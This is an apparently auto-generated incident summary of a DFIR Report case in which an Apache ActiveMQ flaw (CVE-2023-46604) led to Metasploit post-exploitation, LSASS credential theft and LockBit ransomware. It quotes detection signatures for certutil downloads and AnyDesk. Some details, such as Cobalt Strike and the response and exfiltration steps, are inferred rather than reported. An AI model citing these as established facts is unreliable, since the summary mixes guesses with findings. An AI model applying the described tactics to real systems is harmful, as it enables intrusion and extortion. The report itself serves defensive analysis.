Full Report
Key Takeaways An audio version of this report can be found on Spotify, Apple, YouTube, Audible, & Amazon. This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring […] The post Apache ActiveMQ Exploit Leads to LockBit Ransomware appeared first on The DFIR Report.
Analysis Summary
# Incident Report: LockBit Ransomware via ActiveMQ Exploit
## Executive Summary
In mid-February 2024, a threat actor gained initial access by exploiting CVE-2023-46604 on an internet-facing Apache ActiveMQ server, leading to Remote Code Execution (RCE). Although initially evicted, the actor regained access 18 days later, performed extensive post-exploitation activities including credential access and lateral movement, and ultimately deployed LockBit ransomware derived from a leaked builder.
## Incident Details
- Discovery Date: Not explicitly stated, but implied shortly after the final ransomware deployment.
- Incident Date: Began mid-February 2024.
- Affected Organization: Not disclosed (Referenced as "The DFIR Report" context).
- Sector: Not disclosed.
- Geography: Not disclosed.
## Timeline of Events
### Initial Access
- **Date/Time:** Mid-February 2024.
- **Vector:** Exploitation of vulnerability CVE-2023-46604 on an Apache ActiveMQ server.
- **Details:** Threat actor utilized a Java Spring class and a custom Java Spring component to achieve Remote Code Execution (RCE). The actor was evicted but regained access 18 days later to the same server.
### Lateral Movement
- **Date/Time:** Following the second access (approx. 18 days after initial intrusion).
- **Vector:** Post-exploitation tools, specifically Metasploit/Meterpreter.
- **Details:** Attacker escalated privileges, accessed LSASS process memory, and moved laterally across the network.
### Data Exfiltration/Impact
- **Date/Time:** Following successful lateral movement.
- **Impact:** Deployment of LockBit ransomware, customized using a leaked builder. The actor leveraged extracted credentials to deploy the ransomware via RDP.
### Detection & Response
- **Detection:** Implied detection occurred following the ransomware deployment, leading to the DFIR investigation.
- **Response Actions:** Immediate actions included eviction of the threat actor following the first intrusion, however, this was unsuccessful as they returned. Containment and eradication procedures for the final ransomware deployment would have followed.
## Attack Methodology
- **Initial Access:** Exploitation of CVE-2023-46604 on Apache ActiveMQ (RCE via Java Spring class/component).
- **Persistence:** Implied through established remote access tools or backdoors post-re-compromise, evidenced by later RDP deployment.
- **Privilege Escalation:** Achieved during post-exploitation using Metasploit/Meterpreter utilities.
- **Defense Evasion:** Use of known tools like Metasploit/Meterpreter, and potentially techniques associated with the custom LockBit builder (e.g., use of Session messaging service).
- **Credential Access:** Accessing LSASS process memory was observed. Extracted credentials were used for RDP deployment of ransomware.
- **Discovery:** Implied during post-exploitation activities (Metasploit usage).
- **Lateral Movement:** Executed via network traversal tools, aided by compromised credentials.
- **Collection:** Not explicitly detailed, but necessary for ransomware deployment.
- **Exfiltration:** Not explicitly mentioned, but standard for ransomware operations.
- **Impact:** Full deployment of LockBit ransomware.
## Impact Assessment
- **Financial:** Not quantified, but involvement of LockBit ransomware implies significant recovery and operational costs.
- **Data Breach:** Implied data access due to credential harvesting (LSASS access), but specific data types/volume unstated.
- **Operational:** Severe operational disruption due to LockBit ransomware deployment, necessitating recovery and system rebuilding.
- **Reputational:** Not detailed.
## Indicators of Compromise
*Note: Indicators are derived from associated activities; specific hashes/IPs were not provided in the summary.*
- **Network Indicators (Defanged):**
- Network activity related to Remote Access Software (e.g., AnyDesk observed in related activity).
- DNS queries for known Remote Access Software domains from non-browser applications.
- **File Indicators:**
- Custom LockBit ransomware binary (modified ransom note/communication structure).
- **Behavioral Indicators:**
- Use of `ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)`.
- Execution related to debugger checks (`ET INFO EXE IsDebuggerPresent`).
- Use of `certutil` for file download (`ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request`).
- Cobalt Strike execution artifacts (implied by post-exploitation tooling).
- Silent installation and configuration/service creation of AnyDesk RMM.
## Response Actions
- **Containment:** Eviction following the initial intrusion attempt, though this failed as the actor returned 18 days later. Final containment would involve isolating systems from the network following ransomware deployment.
- **Eradication:** Steps necessary to remove persistence mechanisms, the ransomware binary, and associated attacker tooling (Metasploit/Meterpreter).
- **Recovery:** Restoration of affected systems, likely involving wiping and rebuilding due to the ransomware encryption.
## Lessons Learned
- **Patch Management Criticality:** Immediate remediation of vulnerabilities like CVE-2023-46604 on internet-facing services is paramount, as failure to completely secure the service allowed for re-entry.
- **Persistence Remediation:** The initial eviction was insufficient; thorough host and network hygiene must be performed after eviction to ensure all persistence mechanisms are removed.
- **Ransomware Customization Awareness:** The use of a leaked LockBit builder suggests threat actors are evolving tools, evidenced by modified ransom notes and communication methods (Session messaging).
## Recommendations
- **Immediate Patching:** Prioritize patching of all known critical vulnerabilities, especially on public-facing services like Apache ActiveMQ.
- **Vulnerability Management:** Implement continuous monitoring and vulnerability scanning for internet-facing assets to detect potential exploit vectors quickly.
- **Credential Hygiene:** Implement robust credential monitoring, especially concerning access to memory segments like LSASS, and ensure the use of strong, unique credentials across services.
- **Detection Engineering:** Deploy specific detection rules for post-exploitation frameworks (like Metasploit/Meterpreter artifacts) and known ransomware deployment tactics (e.g., RDP credential usage for mass deployment).